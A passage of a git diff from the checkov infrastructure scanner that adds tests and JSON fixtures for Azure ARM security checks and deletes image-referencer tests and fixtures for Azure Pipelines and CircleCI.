report.passed_checks} + failed_check_resources = {c.resource for c in report.failed_checks} + + self.assertEqual(summary["passed"], len(passing_resources)) + self.assertEqual(summary["failed"], len(failing_resources)) + self.assertEqual(summary["skipped"], 0) + self.assertEqual(summary["parsing_errors"], 0) + + self.assertEqual(passing_resources, passed_check_resources) + self.assertEqual(failing_resources, failed_check_resources) + +if __name__ == "__main__": + unittest.main() \ No newline at end of file diff --git a/tests/arm/checks/resource/test_MySQLServerMinTLSVersion.py b/tests/arm/checks/resource/test_MySQLServerMinTLSVersion.py new file mode 100644 index 00000000000..a60ceeb8af7 --- /dev/null +++ b/tests/arm/checks/resource/test_MySQLServerMinTLSVersion.py @@ -0,0 +1,44 @@ +import os +import unittest +from pathlib import Path + +from checkov.arm.checks.resource.MySQLServerMinTLSVersion import check +from checkov.arm.runner import Runner +from checkov.runner_filter import RunnerFilter + + +class TestMySQLServerMinTLSVersion(unittest.TestCase): + + def test_summary(self): + # given + test_files_dir = Path(__file__).parent / "example_MySQLServerMinTLSVersion" + + # when + report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id])) + + # then + summary = report.get_summary() + + passing_resources = { + "Microsoft.DBforMySQL/servers.pass", + } + failing_resources = { + "Microsoft.DBforMySQL/servers.fail", + } + + passed_check_resources = {c.resource for c in report.passed_checks} + failed_check_resources = {c.resource for c in report.failed_checks} + + self.assertEqual(summary["passed"], len(passing_resources)) + self.assertEqual(summary["failed"], len(failing_resources)) + self.assertEqual(summary["skipped"], 0) + self.assertEqual(summary["parsing_errors"], 0) + + self.assertSetEqual(passing_resources, passed_check_resources) + self.assertSetEqual(failing_resources, failed_check_resources) + + +if __name__ == "__main__": + unittest.main() + + diff --git a/tests/arm/checks/resource/test_StorageSyncPublicAccessDisabled.py b/tests/arm/checks/resource/test_StorageSyncPublicAccessDisabled.py new file mode 100644 index 00000000000..cc0a40f5e9f --- /dev/null +++ b/tests/arm/checks/resource/test_StorageSyncPublicAccessDisabled.py @@ -0,0 +1,40 @@ +import unittest +from pathlib import Path +from checkov.arm.checks.resource.StorageSyncPublicAccessDisabled import check +from checkov.arm.runner import Runner +from checkov.runner_filter import RunnerFilter + + +class TestStorageSyncPublicAccessDisabled(unittest.TestCase): + def test_summary(self): + # given + test_files_dir = Path(__file__).parent / "example_StorageSyncPublicAccessDisabled" + + # when + report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id])) + + # then + summary = report.get_summary() + + passing_resources = { + "Microsoft.StorageSync/storageSyncServices.pass", + } + failing_resources = { + "Microsoft.StorageSync/storageSyncServices.fail1", + "Microsoft.StorageSync/storageSyncServices.fail2", + } + + passed_check_resources = {c.resource for c in report.passed_checks} + failed_check_resources = {c.resource for c in report.failed_checks} + + self.assertEqual(summary["passed"], len(passing_resources)) + self.assertEqual(summary["failed"], len(failing_resources)) + self.assertEqual(summary["skipped"], 0) + self.assertEqual(summary["parsing_errors"], 0) + + self.assertEqual(passing_resources, passed_check_resources) + self.assertEqual(failing_resources, failed_check_resources) + + +if __name__ == '__main__': + unittest.main() diff --git a/tests/arm/graph_builder/checks/resources/AzureMLWorkspacePublicNetwork/expected.yaml b/tests/arm/graph_builder/checks/resources/AzureMLWorkspacePublicNetwork/expected.yaml new file mode 100644 index 00000000000..6cc0925b453 --- /dev/null +++ b/tests/arm/graph_builder/checks/resources/AzureMLWorkspacePublicNetwork/expected.yaml @@ -0,0 +1,7 @@ +pass: + - "Microsoft.MachineLearningServices/workspaces.pass" + - "Microsoft.MachineLearningServices/workspaces.pass2" +fail: + - "Microsoft.MachineLearningServices/workspaces.fail" +evaluated_keys: + - 'properties/publicNetworkAccess' diff --git a/tests/arm/graph_builder/checks/resources/AzureMLWorkspacePublicNetwork/fail.json b/tests/arm/graph_builder/checks/resources/AzureMLWorkspacePublicNetwork/fail.json new file mode 100644 index 00000000000..42f38467201 --- /dev/null +++ b/tests/arm/graph_builder/checks/resources/AzureMLWorkspacePublicNetwork/fail.json @@ -0,0 +1,15 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.MachineLearningServices/workspaces", + "apiVersion": "2022-12-01", + "name": "fail", + "location": "West US", + "properties": { + "publicNetworkAccess": "Enabled" + } + } + ] +} \ No newline at end of file diff --git a/tests/arm/graph_builder/checks/resources/AzureMLWorkspacePublicNetwork/pass.json b/tests/arm/graph_builder/checks/resources/AzureMLWorkspacePublicNetwork/pass.json new file mode 100644 index 00000000000..1c959d41049 --- /dev/null +++ b/tests/arm/graph_builder/checks/resources/AzureMLWorkspacePublicNetwork/pass.json @@ -0,0 +1,15 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.MachineLearningServices/workspaces", + "apiVersion": "2022-12-01", + "name": "pass", + "location": "West US", + "properties": { + "publicNetworkAccess": "Disabled" + } + } + ] +} \ No newline at end of file diff --git a/tests/arm/graph_builder/checks/resources/AzureMLWorkspacePublicNetwork/pass2.json b/tests/arm/graph_builder/checks/resources/AzureMLWorkspacePublicNetwork/pass2.json new file mode 100644 index 00000000000..6161a6b423d --- /dev/null +++ b/tests/arm/graph_builder/checks/resources/AzureMLWorkspacePublicNetwork/pass2.json @@ -0,0 +1,13 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.MachineLearningServices/workspaces", + "apiVersion": "2022-12-01", + "name": "pass2", + "location": "West US", + "properties": {} + } + ] +} \ No newline at end of file diff --git a/tests/arm/graph_builder/checks/test_yaml_policies.py b/tests/arm/graph_builder/checks/test_yaml_policies.py index 5aa84eaae5b..e7789d79b5e 100644 --- a/tests/arm/graph_builder/checks/test_yaml_policies.py +++ b/tests/arm/graph_builder/checks/test_yaml_policies.py @@ -40,6 +40,9 @@ def setUp(self) -> None: def test_AzureSpringCloudConfigWithVnet(self): self.go("AzureSpringCloudConfigWithVnet") + def test_AzureMLWorkspacePublicNetwork(self): + self.go("AzureMLWorkspacePublicNetwork") + def test_registry_load(self): registry = self.get_checks_registry() self.assertGreater(len(registry.checks), 0) diff --git a/tests/azure_pipelines/image_referencer/__init__.py b/tests/azure_pipelines/image_referencer/__init__.py deleted file mode 100644 index e69de29bb2d..00000000000 diff --git a/tests/azure_pipelines/image_referencer/resources/azure-pipelines.yaml b/tests/azure_pipelines/image_referencer/resources/azure-pipelines.yaml deleted file mode 100644 index 69138e5084c..00000000000 --- a/tests/azure_pipelines/image_referencer/resources/azure-pipelines.yaml +++ /dev/null @@ -1,45 +0,0 @@ -trigger: -- master - -resources: - repositories: - - repository: AzureDevOps - type: git - endpoint: AzureDevOps - name: AzureDevOps/AzureDevOps - -stages: -- stage: Example - jobs: - - job: FailNoTag - displayName: FailNoTagDisplayName - pool: - vmImage: 'ubuntu-18.04' - steps: - - task: Docker@2 - inputs: - container: postgres:14.2 - - - job: PassDigest - pool: - vmImage: 'ubuntu-18.04' - - container: nginx:1.17 - - steps: - - script: printenv - -jobs: -- job: MyJob - container: ruby:2.6 - pool: - vmImage: windows-latest - steps: - - script: echo "Running in a container based on myorg/mycontainer:1.0" -- job: MyJob2 - container: - image: ruby:2.6 - pool: - vmImage: ubuntu-latest - steps: - - script: echo "Running in a container based on ruby:2.6" \ No newline at end of file diff --git a/tests/azure_pipelines/image_referencer/resources/single_image/azure-pipelines.yaml b/tests/azure_pipelines/image_referencer/resources/single_image/azure-pipelines.yaml deleted file mode 100644 index 7f54262b530..00000000000 --- a/tests/azure_pipelines/image_referencer/resources/single_image/azure-pipelines.yaml +++ /dev/null @@ -1,15 +0,0 @@ -trigger: -- master - -resources: - repositories: - - repository: AzureDevOps - type: git - endpoint: AzureDevOps - name: AzureDevOps/AzureDevOps - -jobs: -- job: PassTag - pool: - vmImage: 'ubuntu-18.04' - container: redis:latest \ No newline at end of file diff --git a/tests/azure_pipelines/image_referencer/test_azure_pipelines_provider_and_manager.py b/tests/azure_pipelines/image_referencer/test_azure_pipelines_provider_and_manager.py deleted file mode 100644 index 15d932d1474..00000000000 --- a/tests/azure_pipelines/image_referencer/test_azure_pipelines_provider_and_manager.py +++ /dev/null @@ -1,528 +0,0 @@ -from checkov.common.images.image_referencer import Image -from checkov.azure_pipelines.image_referencer.provider import AzurePipelinesProvider -from checkov.azure_pipelines.image_referencer.manager import AzurePipelinesImageReferencerManager - - -def test_provider_extract_images_from_workflow(): - file_path = 'tests/azure_pipelines/image_referencer/resources/azure-pipelines.yaml' - workflow_config = { - "trigger": - [ - "master" - ], - "resources": - { - "repositories": - [ - { - "repository": "AzureDevOps", - "type": "git", - "endpoint": "AzureDevOps", - "name": "AzureDevOps/AzureDevOps", - "__startline__": 6, - "__endline__": 11 - } - ], - "__startline__": 5, - "__endline__": 11 - }, - "stages": - [ - { - "stage": "Example", - "jobs": - [ - { - "job": "FailNoTag", - "displayName": "FailNoTagDisplayName", - "pool": - { - "vmImage": "ubuntu-18.04", - "__startline__": 17, - "__endline__": 18 - }, - "steps": - [ - { - "task": "Docker@2", - "inputs": - { - "container": "postgres:14.2", - "__startline__": 21, - "__endline__": 23 - }, - "__startline__": 19, - "__endline__": 23 - } - ], - "__startline__": 14, - "__endline__": 23 - }, - { - "job": "PassDigest", - "pool": - { - "vmImage": "ubuntu-18.04", - "__startline__": 25, - "__endline__": 27 - }, - "container": "nginx:1.17", - "steps": - [ - { - "script": "printenv", - "__startline__": 30, - "__endline__": 32 - } - ], - "__startline__": 23, - "__endline__": 32 - } - ], - "__startline__": 12, - "__endline__": 32 - } - ], - "jobs": - [ - { - "job": "MyJob", - "container": "ruby:2.6", - "pool": - { - "vmImage": "windows-latest", - "__startline__": 36, - "__endline__": 37 - }, - "steps": - [ - { - "script": "echo \"Running in a container based on myorg/mycontainer:1.0\"", - "__startline__": 38, - "__endline__": 39 - } - ], - "__startline__": 33, - "__endline__": 39 - }, - { - "job": "MyJob2", - "container": - { - "image": "ruby:2.6", - "__startline__": 41, - "__endline__": 42 - }, - "pool": - { - "vmImage": "ubuntu-latest", - "__startline__": 43, - "__endline__": 44 - }, - "steps": - [ - { - "script": "echo \"Running in a container based on ruby:2.6\"", - "__startline__": 45, - "__endline__": 45 - } - ], - "__startline__": 39, - "__endline__": 45 - } - ], - "__startline__": 1, - "__endline__": 45 -} - - azure_pipelines_provider = AzurePipelinesProvider(workflow_config=workflow_config, file_path=file_path) - images = azure_pipelines_provider.extract_images_from_workflow() - - assert set(images) == { - Image( - end_line=23, - start_line=21, - file_path=file_path, - name='postgres:14.2', - related_resource_id='stages[0](Example).jobs[0](FailNoTagDisplayName).steps[0].inputs' - ), - Image( - end_line=32, - start_line=23, - file_path=file_path, - name='nginx:1.17', - related_resource_id='stages[0](Example).jobs[1](PassDigest)' - ), - Image( - end_line=39, - start_line=33, - file_path=file_path, - name='ruby:2.6', - related_resource_id='jobs[0](MyJob)' - ), - Image( - end_line=45, - start_line=39, - file_path=file_path, - name='ruby:2.6', - related_resource_id='jobs[1](MyJob2)' - ) - } - -def test_provider_extract_images_from_workflow_no_images(): - file_path = 'tests/azure_pipelines/image_referencer/resources/azure-pipelines.yaml' - workflow_config = { - "trigger": - [ - "master" - ], - "resources": - { - "repositories": - [ - { - "repository": "AzureDevOps", - "type": "git", - "endpoint": "AzureDevOps", - "name": "AzureDevOps/AzureDevOps", - "__startline__": 6, - "__endline__": 11 - } - ], - "__startline__": 5, - "__endline__": 11 - }, - "stages": - [ - { - "stage": "Example", - "jobs": - [ - { - "job": "FailNoTag", - "displayName": "FailNoTagDisplayName", - "pool": - { - "vmImage": "ubuntu-18.04", - "__startline__": 17, - "__endline__": 19 - }, - "__startline__": 14, - "__endline__": 19 - }, - { - "job": "PassDigest", - "pool": - { - "vmImage": "ubuntu-18.04", - "__startline__": 21, - "__endline__": 23 - }, - "steps": - [ - { - "script": "printenv", - "__startline__": 24, - "__endline__": 26 - } - ], - "__startline__": 19, - "__endline__": 26 - } - ], - "__startline__": 12, - "__endline__": 26 - } - ], - "jobs": - [ - { - "job": "MyJob", - "pool": - { - "vmImage": "windows-latest", - "__startline__": 29, - "__endline__": 30 - }, - "steps": - [ - { - "script": "echo \"Running in a container based on myorg/mycontainer:1.0\"", - "__startline__": 31, - "__endline__": 31 - } - ], - "__startline__": 27, - "__endline__": 31 - } - ], - "__startline__": 1, - "__endline__": 31 -} - - azure_pipelines_provider = AzurePipelinesProvider(workflow_config=workflow_config, file_path=file_path) - images = azure_pipelines_provider.extract_images_from_workflow() - - assert not images - -def test_manager_extract_images_from_workflow(): - file_path = 'tests/azure_pipelines/image_referencer/resources/azure-pipelines.yaml' - workflow_config = { - "trigger": - [ - "master" - ], - "resources": - { - "repositories": - [ - { - "repository": "AzureDevOps", - "type": "git", - "endpoint": "AzureDevOps", - "name": "AzureDevOps/AzureDevOps", - "__startline__": 6, - "__endline__": 11 - } - ], - "__startline__": 5, - "__endline__": 11 - }, - "stages": - [ - { - "stage": "Example", - "jobs": - [ - { - "job": "FailNoTag", - "displayName": "FailNoTagDisplayName", - "pool": - { - "vmImage": "ubuntu-18.04", - "__startline__": 17, - "__endline__": 18 - }, - "steps": - [ - { - "task": "Docker@2", - "inputs": - { - "container": "postgres:14.2", - "__startline__": 21, - "__endline__": 23 - }, - "__startline__": 19, - "__endline__": 23 - } - ], - "__startline__": 14, - "__endline__": 23 - }, - { - "job": "PassDigest", - "pool": - { - "vmImage": "ubuntu-18.04", - "__startline__": 25, - "__endline__": 27 - }, - "container": "nginx:1.17", - "steps": - [ - { - "script": "printenv", - "__startline__": 30, - "__endline__": 32 - } - ], - "__startline__": 23, - "__endline__": 32 - } - ], - "__startline__": 12, - "__endline__": 32 - } - ], - "jobs": - [ - { - "job": "MyJob", - "container": "ruby:2.6", - "pool": - { - "vmImage": "windows-latest", - "__startline__": 36, - "__endline__": 37 - }, - "steps": - [ - { - "script": "echo \"Running in a container based on myorg/mycontainer:1.0\"", - "__startline__": 38, - "__endline__": 39 - } - ], - "__startline__": 33, - "__endline__": 39 - }, - { - "job": "MyJob2", - "container": - { - "image": "ruby:2.6", - "__startline__": 41, - "__endline__": 42 - }, - "pool": - { - "vmImage": "ubuntu-latest", - "__startline__": 43, - "__endline__": 44 - }, - "steps": - [ - { - "script": "echo \"Running in a container based on ruby:2.6\"", - "__startline__": 45, - "__endline__": 45 - } - ], - "__startline__": 39, - "__endline__": 45 - } - ], - "__startline__": 1, - "__endline__": 45 -} - - manager = AzurePipelinesImageReferencerManager(workflow_config=workflow_config, file_path=file_path) - images = manager.extract_images_from_workflow() - - assert set(images) == { - Image( - end_line=23, - start_line=21, - file_path=file_path, - name='postgres:14.2', - related_resource_id='stages[0](Example).jobs[0](FailNoTagDisplayName).steps[0].inputs' - ), - Image( - end_line=32, - start_line=23, - file_path=file_path, - name='nginx:1.17', - related_resource_id='stages[0](Example).jobs[1](PassDigest)' - ), - Image( - end_line=39, - start_line=33, - file_path=file_path, - name='ruby:2.6', - related_resource_id='jobs[0](MyJob)' - ), - Image( - end_line=45, - start_line=39, - file_path=file_path, - name='ruby:2.6', - related_resource_id='jobs[1](MyJob2)' - ) - } - -def test_manager_extract_images_from_workflow_no_images(): - file_path = 'tests/azure_pipelines/image_referencer/resources/azure-pipelines.yaml' - workflow_config = { - "trigger": - [ - "master" - ], - "resources": - { - "repositories": - [ - { - "repository": "AzureDevOps", - "type": "git", - "endpoint": "AzureDevOps", - "name": "AzureDevOps/AzureDevOps", - "__startline__": 6, - "__endline__": 11 - } - ], - "__startline__": 5, - "__endline__": 11 - }, - "stages": - [ - { - "stage": "Example", - "jobs": - [ - { - "job": "FailNoTag", - "displayName": "FailNoTagDisplayName", - "pool": - { - "vmImage": "ubuntu-18.04", - "__startline__": 17, - "__endline__": 19 - }, - "__startline__": 14, - "__endline__": 19 - }, - { - "job": "PassDigest", - "pool": - { - "vmImage": "ubuntu-18.04", - "__startline__": 21, - "__endline__": 23 - }, - "steps": - [ - { - "script": "printenv", - "__startline__": 24, - "__endline__": 26 - } - ], - "__startline__": 19, - "__endline__": 26 - } - ], - "__startline__": 12, - "__endline__": 26 - } - ], - "jobs": - [ - { - "job": "MyJob", - "pool": - { - "vmImage": "windows-latest", - "__startline__": 29, - "__endline__": 30 - }, - "steps": - [ - { - "script": "echo \"Running in a container based on myorg/mycontainer:1.0\"", - "__startline__": 31, - "__endline__": 31 - } - ], - "__startline__": 27, - "__endline__": 31 - } - ], - "__startline__": 1, - "__endline__": 31 -} - - manager = AzurePipelinesImageReferencerManager(workflow_config=workflow_config, file_path=file_path) - images = manager.extract_images_from_workflow() - - assert not images diff --git a/tests/azure_pipelines/image_referencer/test_runner.py b/tests/azure_pipelines/image_referencer/test_runner.py deleted file mode 100644 index 57bd9faa3e6..00000000000 --- a/tests/azure_pipelines/image_referencer/test_runner.py +++ /dev/null @@ -1,57 +0,0 @@ -from pathlib import Path - -from checkov.common.output.report import CheckType - -from checkov.common.bridgecrew.bc_source import get_source_type -from checkov.azure_pipelines.runner import Runner - -from checkov.runner_filter import RunnerFilter -from pytest_mock import MockerFixture - -from tests.common.image_referencer.test_utils import mock_get_license_statuses_async, mock_get_image_cached_result_async - -RESOURCES_PATH = Path(__file__).parent / "resources/single_image" - - -def test_azure_pipelines_workflow(mocker: MockerFixture): - from checkov.common.bridgecrew.platform_integration import bc_integration - file_name = "azure-pipelines.yaml" - image_name = "redis:latest" - test_file = RESOURCES_PATH / file_name - - runner_filter = RunnerFilter(run_image_referencer=True) - bc_integration.bc_source = get_source_type("disabled") - - mocker.patch( - "checkov.common.images.image_referencer.image_scanner.get_scan_results_from_cache_async", - side_effect=mock_get_image_cached_result_async, - ) - mocker.patch( - "checkov.common.images.image_referencer.get_license_statuses_async", - side_effect=mock_get_license_statuses_async, - ) - - reports = Runner().run(root_folder="", files=[str(test_file)], runner_filter=runner_filter) - - assert len(reports) == 2 - - azure_pipelines_report = next(report for report in reports if report.check_type == CheckType.AZURE_PIPELINES) - sca_image_report = next(report for report in reports if report.check_type == CheckType.SCA_IMAGE) - - assert len(azure_pipelines_report.resources) == 0 - assert len(azure_pipelines_report.passed_checks) == 1 - assert len(azure_pipelines_report.failed_checks) == 2 - assert len(azure_pipelines_report.skipped_checks) == 0 - assert len(azure_pipelines_report.parsing_errors) == 0 - - - assert sca_image_report.image_cached_results[0]["dockerImageName"] == image_name - assert sca_image_report.image_cached_results[0]["packages"] == [ - {"type": "os", "name": "tzdata", "version": "2021a-1+deb11u5", "licenses": []} - ] - - assert len(sca_image_report.passed_checks) == 1 - assert len(sca_image_report.failed_checks) == 4 - assert len(sca_image_report.image_cached_results) == 1 - assert len(sca_image_report.skipped_checks) == 0 - assert len(sca_image_report.parsing_errors) == 0 diff --git a/tests/circleci_pipelines/image_referencer/__init__.py b/tests/circleci_pipelines/image_referencer/__init__.py deleted file mode 100644 index e69de29bb2d..00000000000 diff --git a/tests/circleci_pipelines/image_referencer/conftest.py b/tests/circleci_pipelines/image_referencer/conftest.py deleted file mode 100644 index e0fed1f5cd8..00000000000 --- a/tests/circleci_pipelines/image_referencer/conftest.py +++ /dev/null @@ -1,260 +0,0 @@ -from __future__ import annotations -import pytest - -from checkov.common.images.image_referencer import Image - - -@pytest.fixture -def file_path() -> str: - return ".circleci/config.yml" - - -@pytest.fixture -def circleci_config_with_images_definitions(file_path) -> dict: - return { - file_path: { - "orbs": { - "new-orb": "whatever/orbname@goodorb", - "some-orb": "orbs/orbname@dev:blah", - "__startline__": 6, - "__endline__": 9 - }, - "executors": { - "default-executor": { - "machine": { - "image": "windows-server-2022", - "__startline__": 12, - "__endline__": 14 - }, - "__startline__": 11, - "__endline__": 14 - }, - "image-executor": { - "docker": { - "image": "mongo:2.6.8", - "__startline__": 16, - "__endline__": 18 - }, - "__startline__": 15, - "__endline__": 18 - }, - "__startline__": 10, - "__endline__": 18 - }, - "jobs": { - "test-docker-versioned-img": { - "docker": [ - { - "image": "mongo:2.6.8", - "__startline__": 21, - "__endline__": 22 - } - ], - "steps": [ - "some-step" - ], - "__startline__": 20, - "__endline__": 25 - }, - "__startline__": 19, - "__endline__": 25 - }, - "__startline__": 5, - "__endline__": 25 - } - } - - -@pytest.fixture -def circle_ci_filepath_workflow_with_images_config(circleci_config_with_images_definitions, file_path) \ - -> tuple[str, dict]: - return file_path, circleci_config_with_images_definitions.get(file_path) - - -@pytest.fixture -def circleci_config_no_images_definitions(file_path) -> dict: - return { - file_path: { - "orbs": { - "new-orb": "whatever/orbname@goodorb", - "some-orb": "orbs/orbname@dev:blah", - "__startline__": 6, - "__endline__": 9 - }, - "executors": { - "default-executor": { - "machine": { - "image": "windows-server-2022", - "__startline__": 12, - "__endline__": 14 - }, - "__startline__": 11, - "__endline__": 14 - }, - "__startline__": 10, - "__endline__": 14 - }, - "jobs": { - "test-macos-image": { - "macos": { - "xcode": "9.4.1", - "__startline__": 17, - "__endline__": 18 - }, - "steps": [ - "some-step" - ], - "__startline__": 16, - "__endline__": 21 - }, - "test-machine-default": { - "executor": { - "name": "win/default-executor", - "__startline__": 23, - "__endline__": 24 - }, - "steps": [ - "some-step" - ], - "__startline__": 22, - "__endline__": 27 - }, - "__startline__": 15, - "__endline__": 27 - }, - "__startline__": 5, - "__endline__": 27 - } - } - - -@pytest.fixture -def circle_ci_filepath_workflow_no_images_config(circleci_config_no_images_definitions, file_path) -> tuple[str, dict]: - return file_path, circleci_config_no_images_definitions.get(file_path) - - -@pytest.fixture -def circle_ci_image1(file_path) -> Image: - image = Image( - end_line=18, - start_line=16, - name='mongo:2.6.8', - file_path=file_path, - related_resource_id='executors(image-executor).docker.image[1](mongo:2.6.8)', - ) - return image - - -@pytest.fixture -def circle_ci_image2(file_path) -> Image: - image = Image( - end_line=22, - start_line=21, - name='mongo:2.6.8', - file_path=file_path, - related_resource_id='jobs(test-docker-versioned-img).docker.image[1](mongo:2.6.8)', - ) - return image - - -@pytest.fixture -def image_cached_result() -> dict: - return { - "results": [ - { - "id": "sha256:9dbc24674f25eb449df11179ed3717c47348fb3aa985ae14b3936d54c2c09dde", - "name": "postgres:14.2", - "distro": "Debian GNU/Linux 11 (bullseye)", - "distroRelease": "bullseye", - "digest": "sha256:2c954f8c5d03da58f8b82645b783b56c1135df17e650b186b296fa1bb71f9cfd", - "collections": [ - "All" - ], - "packages": [ - { - "type": "os", - "name": "base-files", - "version": "11.1+deb11u3", - "licenses": [ - "GPL" - ] - } - ], - "compliances": [], - "complianceDistribution": { - "critical": 0, - "high": 2, - "medium": 0, - "low": 0, - "total": 2 - }, - "complianceScanPassed": True, - "vulnerabilities": [ - ], - "vulnerabilityDistribution": { - "critical": 9, - "high": 26, - "medium": 8, - "low": 17, - "total": 60 - }, - "vulnerabilityScanPassed": True - } - ] - } - - -@pytest.fixture -def image_cached_results_for_report() -> tuple: - return ( - { - 'image_name': 'redis@sha256:54057dd7e125ca41afe526a877e8bd35ec2cdd33b9217e022ed37bdcf7d09673', - 'related_resource_id': 'jobs(test-docker-hash-img).docker.image[1](redis@sha256:54057dd7e125ca41afe526a877e8bd35ec2cdd33b9217e022ed37bdcf7d09673)', - 'packages': [{'type': 'os', 'name': 'tzdata', 'version': '2021a-1+deb11u5', 'licenses': []}] - }, - { - 'image_name': 'buildpack-deps:latest', - 'related_resource_id': 'jobs(test-docker-latest-img).docker.image[1](buildpack-deps:latest)', - 'packages': [{'type': 'os', 'name': 'tzdata', 'version': '2021a-1+deb11u5', 'licenses': []}] - }, - { - 'image_name': 'mongo:2.6.8', - 'related_resource_id': 'jobs(test-docker-versioned-img).docker.image[1](mongo:2.6.8)', - 'packages': [{'type': 'os', 'name': 'tzdata', 'version': '2021a-1+deb11u5', 'licenses': []}] - }, - { - 'image_name': 'postgres:14.2', - 'related_resource_id': 'jobs(test-docker-versioned-img).docker.image[2](postgres:14.2)', - 'packages': [{'type': 'os', 'name': 'tzdata', 'version': '2021a-1+deb11u5', 'licenses': []}] - }, - { - 'image_name': 'cimg/python:latest', - 'related_resource_id': 'jobs(test-echo).docker.image[1](cimg/python:latest)', - 'packages': [{'type': 'os', 'name': 'tzdata', 'version': '2021a-1+deb11u5', 'licenses': []}] - }, - { - 'image_name': 'cimg/python:latest', - 'related_resource_id': 'jobs(test-inject).docker.image[1](cimg/python:latest)', - 'packages': [{'type': 'os', 'name': 'tzdata', 'version': '2021a-1+deb11u5', 'licenses': []}] - }, - { - 'image_name': 'cimg/python:latest', - 'related_resource_id': 'jobs(test-inject2).docker.image[1](cimg/python:latest)', - 'packages': [{'type': 'os', 'name': 'tzdata', 'version': '2021a-1+deb11u5', 'licenses': []}] - }, - { - 'image_name': 'cimg/python:latest', - 'related_resource_id': 'jobs(test-curl-secret).docker.image[1](cimg/python:latest)', - 'packages': [{'type': 'os', 'name': 'tzdata', 'version': '2021a-1+deb11u5', 'licenses': []}] - }, - { - 'image_name': 'cimg/python:latest', - 'related_resource_id': 'jobs(test-inject-ci-vars).docker.image[1](cimg/python:latest)', - 'packages': [{'type': 'os', 'name': 'tzdata', 'version': '2021a-1+deb11u5', 'licenses': []}] - }, - { - 'image_name': 'mongo:2.6.8', - 'related_resource_id': 'executors(image-executor).docker.image[1](mongo:2.6.8)', - 'packages': [{'type': 'os', 'name': 'tzdata', 'version': '2021a-1+deb11u5', 'licenses': []}] - } - ) diff --git a/tests/circleci_pipelines/image_referencer/test_manager.py b/tests/circleci_pipelines/image_referencer/test_manager.py deleted file mode 100644 index 92ab28b87e6..00000000000 --- a/tests/circleci_pipelines/image_referencer/test_manager.py +++ /dev/null @@ -1,43 +0,0 @@ -from checkov.circleci_pipelines.image_referencer.manager import CircleCIImageReferencerManager - - -def test_extract_images_from_workflow(circle_ci_filepath_workflow_with_images_config, - circle_ci_image1, circle_ci_image2): - file_path, config = circle_ci_filepath_workflow_with_images_config - - manager = CircleCIImageReferencerManager(file_path=file_path, workflow_config=config) - images = manager.extract_images_from_workflow() - - assert set(images) == {circle_ci_image1, circle_ci_image2} - - -def test_extract_images_from_workflow_no_images(circle_ci_filepath_workflow_no_images_config): - file_path, config = circle_ci_filepath_workflow_no_images_config - - manager = CircleCIImageReferencerManager(file_path=file_path, workflow_config=config) - images = manager.extract_images_from_workflow() - - assert not images - -def test_extract_images_from_workflow_nested(circle_ci_filepath_workflow_no_images_config): - file_path = '/tmp/test_path' - config = { - 'workspace_root': '/go/src/github.com/gruntwork-io/terragrunt', - 'defaults': { - 'working_directory': '/go/src/github.com/gruntwork-io/terragrunt', 'docker': [ - {'image': '087285199408.dkr.ecr.us-east-1.amazonaws.com/circle-ci-test-image-base:go1.11', - '__startline__': 6, '__endline__': 8}], '__startline__': 3, '__endline__': 8 - }, - 'jobs': { - 'install_dependencies': { - 'working_directory': '/go/src/github.com/gruntwork-io/terragrunt', 'docker': [ - {'image': '087285199408.dkr.ecr.us-east-1.amazonaws.com/circle-ci-test-image-base:go1.11', - '__startline__': 6, '__endline__': 8}], 'steps': ['checkout'], '__startline__': 11, '__endline__': 32 - } - }, '__startline__': 1, '__endline__': 143 - } - - manager = CircleCIImageReferencerManager(file_path=file_path, workflow_config=config) - images = manager.extract_images_from_workflow() - - assert not images diff --git a/tests/circleci_pipelines/image_referencer/test_provider.py b/tests/circleci_pipelines/image_referencer/test_provider.py deleted file mode 100644 index 4f342a9000b..00000000000 --- a/tests/circleci_pipelines/image_referencer/test_provider.py +++ /dev/null @@ -1,55 +0,0 @@ -import pytest - -from checkov.circleci_pipelines.image_referencer.provider import CircleCIProvider -from checkov.circleci_pipelines.runner import Runner - - -def test_extract_images_from_workflow(circle_ci_filepath_workflow_with_images_config, - circle_ci_image1, circle_ci_image2): - file_path, config = circle_ci_filepath_workflow_with_images_config - - provider = CircleCIProvider(file_path=file_path, workflow_config=config) - images = provider.extract_images_from_workflow() - - assert set(images) == {circle_ci_image1, circle_ci_image2} - - -def test_extract_images_from_workflow_no_images(circle_ci_filepath_workflow_no_images_config): - file_path, config = circle_ci_filepath_workflow_no_images_config - - provider = CircleCIProvider(file_path=file_path, workflow_config=config) - images = provider.extract_images_from_workflow() - - assert not images - -@pytest.mark.parametrize( - "start_line, end_line, tag, supported_entities, old_key_format, expected_key", - [ - (21, - 22, - 'jobs', - ('jobs.*.docker[].{image: image, __startline__: __startline__, __endline__:__endline__}',), - 'jobs.*.docker[].{image: image, __startline__: __startline__, __endline__:__endline__}.jobs.*.docker[].{image: image, __startline__: __startline__, __endline__:__endline__}.CKV_CIRCLECIPIPELINES_1[85:86]', - "jobs(test-docker-versioned-img).docker.image[1](mongo:2.6.8)"), - (16, - 18, - 'executors', - ('executors.*.docker[].{image: image, __startline__: __startline__, __endline__:__endline__}',), - 'executors.*.docker[].{image: image, __startline__: __startline__, __endline__:__endline__}.executors.*.docker[].{image: image, __startline__: __startline__, __endline__:__endline__}.CKV_CIRCLECIPIPELINES_8[16:18]', - "executors(image-executor).docker.image[1](mongo:2.6.8)") - ] -) -def test_generate_resource_key_generates_same_key_as_get_resource(file_path, - start_line, end_line, tag, - supported_entities, - old_key_format, expected_key, - circleci_config_with_images_definitions): - definitions = circleci_config_with_images_definitions.get(file_path) - provider = CircleCIProvider(definitions, file_path) - runner = Runner() - runner.definitions[file_path] = definitions - - key1 = runner.get_resource(file_path, old_key_format, supported_entities, start_line, end_line) - key2 = provider.generate_resource_key(start_line, end_line, tag) - - assert key1 == key2 == expected_key diff --git a/tests/circleci_pipelines/image_referencer/test_runner.py b/tests/circleci_pipelines/image_referencer/test_runner.py deleted file mode 100644 index 5b921f19e5a..00000000000 --- 